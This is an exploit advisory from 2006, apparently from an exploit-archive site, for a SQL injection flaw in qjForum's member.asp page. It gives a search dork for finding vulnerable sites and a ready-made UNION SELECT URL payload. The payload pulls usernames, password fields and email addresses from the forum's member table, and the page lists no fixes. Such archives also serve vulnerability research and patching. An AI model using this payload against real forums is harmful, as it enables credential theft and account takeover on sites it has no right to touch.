qjForum (member.asp) SQL Injection Vulnerability

2006-05-26 00:00:00

# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

#

Fixes

No fixes

In order to submit a new fix you need to be registered.